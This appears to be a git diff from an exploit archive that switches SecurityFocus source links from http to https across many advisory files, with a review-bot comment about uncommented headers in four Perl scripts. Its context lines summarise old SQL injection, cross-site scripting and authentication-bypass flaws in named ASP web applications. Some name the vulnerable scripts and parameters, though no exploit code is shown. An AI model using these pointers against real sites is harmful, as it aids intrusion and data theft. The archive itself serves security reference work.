diff --git a/exploits/asp/webapps/23703.txt b/exploits/asp/webapps/23703.txt index 63fb67e55..cb74dafcf 100644 --- a/exploits/asp/webapps/23703.txt +++ b/exploits/asp/webapps/23703.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9669/info +source: https://www.securityfocus.com/bid/9669/info EarlyImpact ProductCart is reportedly prone to multiple vulnerabilities. The specific issues include SQL injection, cross-site scripting and cryptographic weaknesses. These issues could expose sensitive data such as user credentials and allow for execution of hostile script code and HTML. These issues could allow for full compromise of the software. diff --git a/exploits/asp/webapps/23704.txt b/exploits/asp/webapps/23704.txt index 6f9e8b367..709129c72 100644 --- a/exploits/asp/webapps/23704.txt +++ b/exploits/asp/webapps/23704.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9669/info +source: https://www.securityfocus.com/bid/9669/info EarlyImpact ProductCart is reportedly prone to multiple vulnerabilities. The specific issues include SQL injection, cross-site scripting and cryptographic weaknesses. These issues could expose sensitive data such as user credentials and allow for execution of hostile script code and HTML. These issues could allow for full compromise of the software. diff --git a/exploits/asp/webapps/23729.txt b/exploits/asp/webapps/23729.txt index 69e67f4fd..202665f79 100644 --- a/exploits/asp/webapps/23729.txt +++ b/exploits/asp/webapps/23729.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9693/info +source: https://www.securityfocus.com/bid/9693/info It has been reported that WebStores2000 is prone to a cross-site scripting vulnerability. This issue is reportedly due to a failure to sanitize user input and so allow HTML and script code that may facilitate cross-site scripting attacks. diff --git a/exploits/asp/webapps/23791.txt b/exploits/asp/webapps/23791.txt index 73fe5bdd4..4cecfedcf 100644 
--- a/exploits/asp/webapps/23791.txt +++ b/exploits/asp/webapps/23791.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9799/info +source: https://www.securityfocus.com/bid/9799/info Multiple vulnerabilities have been identified in the application that may allow an attacker to obtain the private cryptographic key and gain access to sensitive information. The application is also reported prone to an SQL injection vulnerability that may allow an attacker to gain administrative level access to the underlying database. diff --git a/exploits/asp/webapps/23813.txt b/exploits/asp/webapps/23813.txt index ae45f2c20..0bc176aeb 100644 --- a/exploits/asp/webapps/23813.txt +++ b/exploits/asp/webapps/23813.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9876/info +source: https://www.securityfocus.com/bid/9876/info It has been reported that the VGW4/8 Telephony Gateway is prone to a remote authentication bypass vulnerability via its web configuration tool. The problem is due to a design error in the application that allows a user to access configuration pages without prior authentication. diff --git a/exploits/asp/webapps/23851.txt b/exploits/asp/webapps/23851.txt index 901115584..cd2765bdb 100644 --- a/exploits/asp/webapps/23851.txt +++ b/exploits/asp/webapps/23851.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9931/info +source: https://www.securityfocus.com/bid/9931/info It has been reported that Member Management System may be prone to a SQL injection vulnerability that may allow a remote attacker to inject malicious SQL syntax into database queries. The problem is reported to exist in the 'ID' parameter contained within the 'resend.asp' and 'news_view.asp' scripts. diff --git a/exploits/asp/webapps/23852.txt b/exploits/asp/webapps/23852.txt index 8968cdf3f..6cbc37243 100644 --- a/exploits/asp/webapps/23852.txt +++ b/exploits/asp/webapps/23852.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9931/info +source: https://www.securityfocus.com/bid/9931/info It has been reported that Member Management System may be prone to a SQL injection vulnerability that may allow a remote attacker to inject malicious SQL syntax into database queries. The problem is reported to exist in the 'ID' parameter contained within the 'resend.asp' and 'news_view.asp' scripts. diff --git a/exploits/asp/webapps/23853.txt b/exploits/asp/webapps/23853.txt index 7c1300b60..2d8b78908 100644 --- a/exploits/asp/webapps/23853.txt +++ b/exploits/asp/webapps/23853.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9932/info +source: https://www.securityfocus.com/bid/9932/info It has been reported that a number of Member Management System scripts are prone to cross-site scripting vulnerabilities. These issues are reportedly due to a failure to sanitize user input and so allow HTML and script code that may facilitate cross-site scripting attacks. The issues are reported to affect the 'err' parameter of 'error.asp' script and the 'register.asp' script. diff --git a/exploits/asp/webapps/23854.txt b/exploits/asp/webapps/23854.txt index 2561fc268..35d4f0e29 100644 --- a/exploits/asp/webapps/23854.txt +++ b/exploits/asp/webapps/23854.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9932/info +source: https://www.securityfocus.com/bid/9932/info It has been reported that a number of Member Management System scripts are prone to cross-site scripting vulnerabilities. These issues are reportedly due to a failure to sanitize user input and so allow HTML and script code that may facilitate cross-site scripting attacks. The issues are reported to affect the 'err' parameter of 'error.asp' script and the 'register.asp' script. diff --git a/exploits/asp/webapps/23857.txt b/exploits/asp/webapps/23857.txt index 37dbd09d9..0a9d882cc 100644 --- a/exploits/asp/webapps/23857.txt +++ b/exploits/asp/webapps/23857.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9935/info +source: https://www.securityfocus.com/bid/9935/info Multiple vulnerabilities have been identified in the application that may allow an attacker to carry out SQL injection, cross-site scripting, and account hijacking attacks. diff --git a/exploits/asp/webapps/23858.txt b/exploits/asp/webapps/23858.txt index 4aa122b4f..d815b7b97 100644 --- a/exploits/asp/webapps/23858.txt +++ b/exploits/asp/webapps/23858.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9935/info +source: https://www.securityfocus.com/bid/9935/info Multiple vulnerabilities have been identified in the application that may allow an attacker to carry out SQL injection, cross-site scripting, and account hijacking attacks. diff --git a/exploits/asp/webapps/23859.txt b/exploits/asp/webapps/23859.txt index eca6106a8..c2c4102ae 100644 --- a/exploits/asp/webapps/23859.txt +++ b/exploits/asp/webapps/23859.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9935/info +source: https://www.securityfocus.com/bid/9935/info Multiple vulnerabilities have been identified in the application that may allow an attacker to carry out SQL injection, cross-site scripting, and account hijacking attacks. diff --git a/exploits/asp/webapps/23860.txt b/exploits/asp/webapps/23860.txt index be53265d9..c2375b158 100644 --- a/exploits/asp/webapps/23860.txt +++ b/exploits/asp/webapps/23860.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9935/info +source: https://www.securityfocus.com/bid/9935/info Multiple vulnerabilities have been identified in the application that may allow an attacker to carry out SQL injection, cross-site scripting, and account hijacking attacks. diff --git a/exploits/asp/webapps/23861.txt b/exploits/asp/webapps/23861.txt index 93c1c9060..ec2c4d6fa 100644 --- a/exploits/asp/webapps/23861.txt +++ b/exploits/asp/webapps/23861.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9935/info +source: https://www.securityfocus.com/bid/9935/info Multiple vulnerabilities have been identified in the application that may allow an attacker to carry out SQL injection, cross-site scripting, and account hijacking attacks. diff --git a/exploits/asp/webapps/23862.txt b/exploits/asp/webapps/23862.txt index 9dbf30048..706359a06 100644 --- a/exploits/asp/webapps/23862.txt +++ b/exploits/asp/webapps/23862.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9935/info +source: https://www.securityfocus.com/bid/9935/info Multiple vulnerabilities have been identified in the application that may allow an attacker to carry out SQL injection, cross-site scripting, and account hijacking attacks. diff --git a/exploits/asp/webapps/23863.txt b/exploits/asp/webapps/23863.txt index 144dc53f2..02064b901 100644 --- a/exploits/asp/webapps/23863.txt +++ b/exploits/asp/webapps/23863.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9935/info +source: https://www.securityfocus.com/bid/9935/info Multiple vulnerabilities have been identified in the application that may allow an attacker to carry out SQL injection, cross-site scripting, and account hijacking attacks. diff --git a/exploits/asp/webapps/23891.txt b/exploits/asp/webapps/23891.txt index c477ea24c..faef3588c 100644 --- a/exploits/asp/webapps/23891.txt +++ b/exploits/asp/webapps/23891.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9997/info +source: https://www.securityfocus.com/bid/9997/info Reportedly A-Cart is prone to multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied input prior to its use in SQL queries and generation of dynamic content. diff --git a/exploits/asp/webapps/23895.txt b/exploits/asp/webapps/23895.txt index 52d38127c..2d2ba2170 100644 --- a/exploits/asp/webapps/23895.txt +++ b/exploits/asp/webapps/23895.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10005/info +source: https://www.securityfocus.com/bid/10005/info It has been reported that Interchange may be prone to a remote information disclosure vulnerability allowing attackers to disclose contents of arbitrary variables via URI requests. diff --git a/exploits/asp/webapps/23898.txt b/exploits/asp/webapps/23898.txt index 7567e6053..e4db07aeb 100644 --- a/exploits/asp/webapps/23898.txt +++ b/exploits/asp/webapps/23898.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10019/info +source: https://www.securityfocus.com/bid/10019/info Reportedly CactuShop is prone to a remote SQL injection vulnerability. This issue is due to a failure to properly sanitize user-supplied URI input before using it to craft an SQL query. diff --git a/exploits/asp/webapps/23899.txt b/exploits/asp/webapps/23899.txt index b53fe8ad1..87b428a6a 100644 --- a/exploits/asp/webapps/23899.txt +++ b/exploits/asp/webapps/23899.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10020/info +source: https://www.securityfocus.com/bid/10020/info Reportedly CactuShop is prone to a remote cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user supplied URI input. diff --git a/exploits/asp/webapps/24039.txt b/exploits/asp/webapps/24039.txt index 4e81112cb..4cd7440f8 100644 --- a/exploits/asp/webapps/24039.txt +++ b/exploits/asp/webapps/24039.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10194/info +source: https://www.securityfocus.com/bid/10194/info Reportedly NewsTraXor is affected by a remote database disclosure vulnerability. This issue is due to a design error that allows the database file to be globally readable. diff --git a/exploits/asp/webapps/24049.txt b/exploits/asp/webapps/24049.txt index 4d7081867..7e82a865e 100644 --- a/exploits/asp/webapps/24049.txt +++ b/exploits/asp/webapps/24049.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10208/info +source: https://www.securityfocus.com/bid/10208/info It has been reported that Modular Site Management System may be prone to an information disclosure issue that could allow an attacker to gain access to a server's configuration information. diff --git a/exploits/asp/webapps/24184.txt b/exploits/asp/webapps/24184.txt index f16ce0244..99b133c26 100644 --- a/exploits/asp/webapps/24184.txt +++ b/exploits/asp/webapps/24184.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10506/info +source: https://www.securityfocus.com/bid/10506/info AspDotNetStorefront is reportedly prone to an access validation vulnerability that may allow a remote attacker to delete arbitrary contents from a vulnerable Web site. The issue occurs because the 'deleteicon.aspx' script does not validate access before allowing an unprivileged user to delete contents such as icons and images from the site. diff --git a/exploits/asp/webapps/24185.txt b/exploits/asp/webapps/24185.txt index 68f527940..ba99dd2d5 100644 --- a/exploits/asp/webapps/24185.txt +++ b/exploits/asp/webapps/24185.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10507/info +source: https://www.securityfocus.com/bid/10507/info AspDotNetStorefront is prone to a cross-site scripting vulnerability. This issue exists due to insufficient sanitization of user-supplied data. The problem presents itself in the 'returnurl' parameter of the 'signin.aspx' script of the application and can allow remote attackers to steal cookie-based authentication credentials and carry out other attacks. diff --git a/exploits/asp/webapps/24198.txt b/exploits/asp/webapps/24198.txt index a4064be2f..6893ebf51 100644 --- a/exploits/asp/webapps/24198.txt +++ b/exploits/asp/webapps/24198.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10534/info +source: https://www.securityfocus.com/bid/10534/info A vulnerability exists in the software that may allow a remote user to launch cross-site scripting attacks. The problem is reported to exist due to improper sanitizing of user-supplied data in the 'shoperror.asp' script. diff --git a/exploits/asp/webapps/24214.txt b/exploits/asp/webapps/24214.txt index 0e25a35f9..e916713ce 100644 --- a/exploits/asp/webapps/24214.txt +++ b/exploits/asp/webapps/24214.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10555/info +source: https://www.securityfocus.com/bid/10555/info A vulnerability exists in the Web Wiz Forums software that may allow a remote user to launch cross-site scripting attacks. The problem is reported to exist due to improper sanitizing of user-supplied data passed to the 'registration_rules.asp' script. diff --git a/exploits/asp/webapps/24260.txt b/exploits/asp/webapps/24260.txt index 5370bd303..a8d8ed747 100644 --- a/exploits/asp/webapps/24260.txt +++ b/exploits/asp/webapps/24260.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10674/info +source: https://www.securityfocus.com/bid/10674/info Comersus Cart is reported prone to multiple vulnerabilities. These issues may allow a remote attacker to carry out cross-site scripting attacks and manipulate parameters to change the price of an order. diff --git a/exploits/asp/webapps/24261.txt b/exploits/asp/webapps/24261.txt index 83d089d6f..9236f46e0 100644 --- a/exploits/asp/webapps/24261.txt +++ b/exploits/asp/webapps/24261.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10674/info +source: https://www.securityfocus.com/bid/10674/info Comersus Cart is reported prone to multiple vulnerabilities. These issues may allow a remote attacker to carry out cross-site scripting attacks and manipulate parameters to change the price of an order. 
diff --git a/exploits/asp/webapps/24298.pl b/exploits/asp/webapps/24298.pl index 1cbff3a20..ab252ec45 100755 --- a/exploits/asp/webapps/24298.pl +++ b/exploits/asp/webapps/24298.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10771/info +source: https://www.securityfocus.com/bid/10771/info An SQL injection vulnerability is identified in the application that may allow attackers to pass malicious input to database queries, resulting in the modification of query logic or other attacks. diff --git a/exploits/asp/webapps/24299.pl b/exploits/asp/webapps/24299.pl index 3f78541d2..9a44946d3 100755 --- a/exploits/asp/webapps/24299.pl +++ b/exploits/asp/webapps/24299.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10772/info +source: https://www.securityfocus.com/bid/10772/info An SQL injection vulnerability is identified in the application that may allow attackers to pass malicious input to database queries, resulting in the modification of query logic or other attacks. diff --git a/exploits/asp/webapps/24300.pl b/exploits/asp/webapps/24300.pl index 857414ad2..7ddfbf8c4 100755 --- a/exploits/asp/webapps/24300.pl +++ b/exploits/asp/webapps/24300.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10773/info +source: https://www.securityfocus.com/bid/10773/info LBE Web HelpDesk is reported susceptible to an SQL injection vulnerability. This issue is due to improper sanitization of user-supplied data. diff --git a/exploits/asp/webapps/24302.pl b/exploits/asp/webapps/24302.pl index edef47697..39a6f2188 100755 --- a/exploits/asp/webapps/24302.pl +++ b/exploits/asp/webapps/24302.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10775/info +source: https://www.securityfocus.com/bid/10775/info Polar Helpdesk is reported prone to a cookie based authentication system bypass vulnerability. It is reported that the authentication and privilege system for Polar Helpdesk is based entirely on the values read from a cookie that is saved on the client system. An attacker may modify values in the appropriate cookie to gain administrative access to the affected software. diff --git a/exploits/asp/webapps/24313.txt b/exploits/asp/webapps/24313.txt index f62975f02..80b47d45a 100644 --- a/exploits/asp/webapps/24313.txt +++ b/exploits/asp/webapps/24313.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10799/info +source: https://www.securityfocus.com/bid/10799/info ASPRunner is reported prone to multiple vulnerabilities. The reported issues include SQL injection, cross-site scripting, information disclosure and unauthorized access to database files. diff --git a/exploits/asp/webapps/24314.txt b/exploits/asp/webapps/24314.txt index 15a644826..2656aaf5b 100644 --- a/exploits/asp/webapps/24314.txt +++ b/exploits/asp/webapps/24314.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10799/info +source: https://www.securityfocus.com/bid/10799/info ASPRunner is reported prone to multiple vulnerabilities. The reported issues include SQL injection, cross-site scripting, information disclosure and unauthorized access to database files. diff --git a/exploits/asp/webapps/24315.txt b/exploits/asp/webapps/24315.txt index 50ba4cbb6..ef601ab91 100644 --- a/exploits/asp/webapps/24315.txt +++ b/exploits/asp/webapps/24315.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10799/info +source: https://www.securityfocus.com/bid/10799/info ASPRunner is reported prone to multiple vulnerabilities. The reported issues include SQL injection, cross-site scripting, information disclosure and unauthorized access to database files. 
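Review bot: In 24298.pl, 24299.pl, 24300.pl and 24302.pl the rewritten line 1 is still bare text (`source: https://...`) with no `#` in front of it, and the description that follows it in each hunk is uncommented prose too, even though all four files are mode 100755. This commit already touches that line in every one of them, so consider turning the header lines into `#` comments here or in a follow-up, so that the header does not have to be stripped by hand before the scripts can be run or linted.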
diff --git a/exploits/asp/webapps/24316.txt b/exploits/asp/webapps/24316.txt index ac8d2e4f5..f498eea18 100644 --- a/exploits/asp/webapps/24316.txt +++ b/exploits/asp/webapps/24316.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10799/info +source: https://www.securityfocus.com/bid/10799/info ASPRunner is reported prone to multiple vulnerabilities. The reported issues include SQL injection, cross-site scripting, information disclosure and unauthorized access to database files. diff --git a/exploits/asp/webapps/24317.txt b/exploits/asp/webapps/24317.txt index 7c64ae4a0..e8890f2fe 100644 --- a/exploits/asp/webapps/24317.txt +++ b/exploits/asp/webapps/24317.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10799/info +source: https://www.securityfocus.com/bid/10799/info ASPRunner is reported prone to multiple vulnerabilities. The reported issues include SQL injection, cross-site scripting, information disclosure and unauthorized access to database files. diff --git a/exploits/asp/webapps/24368.txt b/exploits/asp/webapps/24368.txt index 8a3393c2e..2925ac49d 100644 --- a/exploits/asp/webapps/24368.txt +++ b/exploits/asp/webapps/24368.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10927/info +source: https://www.securityfocus.com/bid/10927/info Multiple remote vulnerabilities are reported in MapInfo Discovery. diff --git a/exploits/asp/webapps/24369.txt b/exploits/asp/webapps/24369.txt index dd84f1930..7af6f201b 100644 --- a/exploits/asp/webapps/24369.txt +++ b/exploits/asp/webapps/24369.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10927/info +source: https://www.securityfocus.com/bid/10927/info Multiple remote vulnerabilities are reported in MapInfo Discovery. diff --git a/exploits/asp/webapps/24370.txt b/exploits/asp/webapps/24370.txt index da51befa9..185ca4f75 100644 --- a/exploits/asp/webapps/24370.txt +++ b/exploits/asp/webapps/24370.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10927/info +source: https://www.securityfocus.com/bid/10927/info Multiple remote vulnerabilities are reported in MapInfo Discovery. diff --git a/exploits/asp/webapps/24371.txt b/exploits/asp/webapps/24371.txt index 0e2e986c8..24dd33453 100644 --- a/exploits/asp/webapps/24371.txt +++ b/exploits/asp/webapps/24371.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10927/info +source: https://www.securityfocus.com/bid/10927/info Multiple remote vulnerabilities are reported in MapInfo Discovery. diff --git a/exploits/asp/webapps/24385.txt b/exploits/asp/webapps/24385.txt index c7eb7545f..bcd3be972 100644 --- a/exploits/asp/webapps/24385.txt +++ b/exploits/asp/webapps/24385.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10982/info +source: https://www.securityfocus.com/bid/10982/info Zixforum is reported prone to a database disclosure vulnerability. It is reported that remote users may download the database file ''ZixForum.mdb' and gain access to sensitive information including unencrypted authentication credentials. diff --git a/exploits/asp/webapps/24397.txt b/exploits/asp/webapps/24397.txt index 9401a197c..ca88e9520 100644 --- a/exploits/asp/webapps/24397.txt +++ b/exploits/asp/webapps/24397.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11004/info +source: https://www.securityfocus.com/bid/11004/info CNU5 is reported prone to a database disclosure vulnerability. It is reported that remote users may download the database file 'news.mdb' and gain access to sensitive information including unencrypted authentication credentials. diff --git a/exploits/asp/webapps/24420.txt b/exploits/asp/webapps/24420.txt index 9128e9b40..d84f0b92f 100644 --- a/exploits/asp/webapps/24420.txt +++ b/exploits/asp/webapps/24420.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11073/info +source: https://www.securityfocus.com/bid/11073/info Password Protect is reported prone to a multiple cross-site scripting and SQL injection vulnerabilities. These issues occur due to insufficient sanitization of user-supplied input. Successful exploitation of these issues may result in arbitrary HTML and script code execution and/or compromise of the underlying database. diff --git a/exploits/asp/webapps/24422.txt b/exploits/asp/webapps/24422.txt index c931401a7..7705a20ec 100644 --- a/exploits/asp/webapps/24422.txt +++ b/exploits/asp/webapps/24422.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11083/info +source: https://www.securityfocus.com/bid/11083/info Comersus Cart is reported prone to a HTTP response splitting vulnerability. A remote attacker may exploit this vulnerability to influence or misrepresent how web content is served, cached or interpreted. This could aid in various attacks, which try to entice client users into a false sense of trust. diff --git a/exploits/asp/webapps/24588.txt b/exploits/asp/webapps/24588.txt index 59dfed376..f8ad97114 100644 --- a/exploits/asp/webapps/24588.txt +++ b/exploits/asp/webapps/24588.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11149/info +source: https://www.securityfocus.com/bid/11149/info Reportedly getSolutions getIntranet is affected by multiple remote input validation vulnerabilities. These issues are caused by a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/24589.txt b/exploits/asp/webapps/24589.txt index 71aa7edd5..616cb20da 100644 --- a/exploits/asp/webapps/24589.txt +++ b/exploits/asp/webapps/24589.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11150/info +source: https://www.securityfocus.com/bid/11150/info getInternet is vulnerable to multiple remote SQL injection vulnerabilities in the 'welcome.asp', 'checklogin.asp', and 'lostpassword.asp' scripts. These issues are due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. diff --git a/exploits/asp/webapps/24604.txt b/exploits/asp/webapps/24604.txt index c70647450..62b7373e0 100644 --- a/exploits/asp/webapps/24604.txt +++ b/exploits/asp/webapps/24604.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11201/info +source: https://www.securityfocus.com/bid/11201/info Snitz Forums is reported prone to a HTTP response splitting vulnerability. The issue exists in a parameter of the 'down.asp' script. The issue presents itself due to a flaw in the affected script that allows an attacker to manipulate how GET requests are handled. diff --git a/exploits/asp/webapps/24625.txt b/exploits/asp/webapps/24625.txt index 71ba59782..2c6dca4c0 100644 --- a/exploits/asp/webapps/24625.txt +++ b/exploits/asp/webapps/24625.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11250/info +source: https://www.securityfocus.com/bid/11250/info Reportedly BroadBoard Message Board is affected by multiple SQL injection vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied URI input prior to using it in an SQL query. diff --git a/exploits/asp/webapps/24626.txt b/exploits/asp/webapps/24626.txt index 5fd746fd3..1d9310a73 100644 --- a/exploits/asp/webapps/24626.txt +++ b/exploits/asp/webapps/24626.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11250/info +source: https://www.securityfocus.com/bid/11250/info Reportedly BroadBoard Message Board is affected by multiple SQL injection vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied URI input prior to using it in an SQL query. diff --git a/exploits/asp/webapps/24631.txt b/exploits/asp/webapps/24631.txt index 4f141e001..2a1b65fc1 100644 --- a/exploits/asp/webapps/24631.txt +++ b/exploits/asp/webapps/24631.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11253/info +source: https://www.securityfocus.com/bid/11253/info MegaBBS is reported prone to multiple vulnerabilities. These issues exist due to insufficient sanitization of user-supplied data and may allow an attacker to carry out HTTP response splitting and SQL injection attacks. diff --git a/exploits/asp/webapps/24632.txt b/exploits/asp/webapps/24632.txt index a8feced6f..7257a70be 100644 --- a/exploits/asp/webapps/24632.txt +++ b/exploits/asp/webapps/24632.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11253/info +source: https://www.securityfocus.com/bid/11253/info MegaBBS is reported prone to multiple vulnerabilities. These issues exist due to insufficient sanitization of user-supplied data and may allow an attacker to carry out HTTP response splitting and SQL injection attacks. diff --git a/exploits/asp/webapps/24633.txt b/exploits/asp/webapps/24633.txt index 20f4d6c67..f3a4b7d22 100644 --- a/exploits/asp/webapps/24633.txt +++ b/exploits/asp/webapps/24633.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11253/info +source: https://www.securityfocus.com/bid/11253/info MegaBBS is reported prone to multiple vulnerabilities. These issues exist due to insufficient sanitization of user-supplied data and may allow an attacker to carry out HTTP response splitting and SQL injection attacks. 
diff --git a/exploits/asp/webapps/24666.txt b/exploits/asp/webapps/24666.txt index 624ac736d..18fc1b364 100644 --- a/exploits/asp/webapps/24666.txt +++ b/exploits/asp/webapps/24666.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11342/info +source: https://www.securityfocus.com/bid/11342/info Microsoft ASP.NET is reported prone to a remote information-disclosure vulnerability because the application fails to properly secure documents when handling malformed URI requests. diff --git a/exploits/asp/webapps/24670.txt b/exploits/asp/webapps/24670.txt index 1f8618028..827139584 100644 --- a/exploits/asp/webapps/24670.txt +++ b/exploits/asp/webapps/24670.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11361/info +source: https://www.securityfocus.com/bid/11361/info GoSmart Message Board is reported prone to multiple input validation vulnerabilities. These issues may allow a remote attacker to carry out cross-site scripting and SQL injection attacks. The cause of these issue is insufficient sanitization of user-supplied data. diff --git a/exploits/asp/webapps/24671.txt b/exploits/asp/webapps/24671.txt index 6d3d278f9..d2580110f 100644 --- a/exploits/asp/webapps/24671.txt +++ b/exploits/asp/webapps/24671.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11363/info +source: https://www.securityfocus.com/bid/11363/info Multiple vulnerabilities have been identified in the software that may allow a remote attacker to carry out SQL injection and HTML injection attacks. An attacker may also gain unauthorized access to a user's account. diff --git a/exploits/asp/webapps/24672.txt b/exploits/asp/webapps/24672.txt index 52d2427df..27bf3c52e 100644 --- a/exploits/asp/webapps/24672.txt +++ b/exploits/asp/webapps/24672.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11363/info +source: https://www.securityfocus.com/bid/11363/info Multiple vulnerabilities have been identified in the software that may allow a remote attacker to carry out SQL injection and HTML injection attacks. An attacker may also gain unauthorized access to a user's account. diff --git a/exploits/asp/webapps/24673.txt b/exploits/asp/webapps/24673.txt index 8450a38b7..f37036d71 100644 --- a/exploits/asp/webapps/24673.txt +++ b/exploits/asp/webapps/24673.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11363/info +source: https://www.securityfocus.com/bid/11363/info Multiple vulnerabilities have been identified in the software that may allow a remote attacker to carry out SQL injection and HTML injection attacks. An attacker may also gain unauthorized access to a user's account. diff --git a/exploits/asp/webapps/24674.txt b/exploits/asp/webapps/24674.txt index 1368e675b..86671fb40 100644 --- a/exploits/asp/webapps/24674.txt +++ b/exploits/asp/webapps/24674.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11363/info +source: https://www.securityfocus.com/bid/11363/info Multiple vulnerabilities have been identified in the software that may allow a remote attacker to carry out SQL injection and HTML injection attacks. An attacker may also gain unauthorized access to a user's account. diff --git a/exploits/asp/webapps/24675.txt b/exploits/asp/webapps/24675.txt index 46f987b00..ff73e7c4c 100644 --- a/exploits/asp/webapps/24675.txt +++ b/exploits/asp/webapps/24675.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11363/info +source: https://www.securityfocus.com/bid/11363/info Multiple vulnerabilities have been identified in the software that may allow a remote attacker to carry out SQL injection and HTML injection attacks. An attacker may also gain unauthorized access to a user's account. 
diff --git a/exploits/asp/webapps/24717.txt b/exploits/asp/webapps/24717.txt index 02d7ff25d..1c34d8720 100644 --- a/exploits/asp/webapps/24717.txt +++ b/exploits/asp/webapps/24717.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11586/info +source: https://www.securityfocus.com/bid/11586/info Helm Control Panel is reported prone to multiple vulnerabilities. These include an SQL injection issue and an HTML injection vulnerability. A remote attacker can execute arbitrary HTML and script code in a user's browser. Manipulation of SQL queries to reveal or corrupt sensitive database data is possible as well. diff --git a/exploits/asp/webapps/24838.txt b/exploits/asp/webapps/24838.txt index 29a515b88..5b80dde30 100644 --- a/exploits/asp/webapps/24838.txt +++ b/exploits/asp/webapps/24838.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11931/info +source: https://www.securityfocus.com/bid/11931/info ASP Calendar is reported prone to an unauthorized administrative access vulnerability. An unauthorized remote attacker can access an administrative script and potentially gain administrative access to the application. diff --git a/exploits/asp/webapps/24840.txt b/exploits/asp/webapps/24840.txt index ef17081aa..fae2f1357 100644 --- a/exploits/asp/webapps/24840.txt +++ b/exploits/asp/webapps/24840.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11933/info +source: https://www.securityfocus.com/bid/11933/info A remote SQL injection vulnerability reportedly affects ASP-Rider Web blog. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in SQL queries. diff --git a/exploits/asp/webapps/25060.txt b/exploits/asp/webapps/25060.txt index 98d1f4b16..40e442755 100644 --- a/exploits/asp/webapps/25060.txt +++ b/exploits/asp/webapps/25060.txt 
